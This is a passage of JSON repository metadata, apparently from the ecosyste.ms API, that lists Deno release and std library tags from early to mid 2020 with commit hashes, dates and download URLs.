:null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.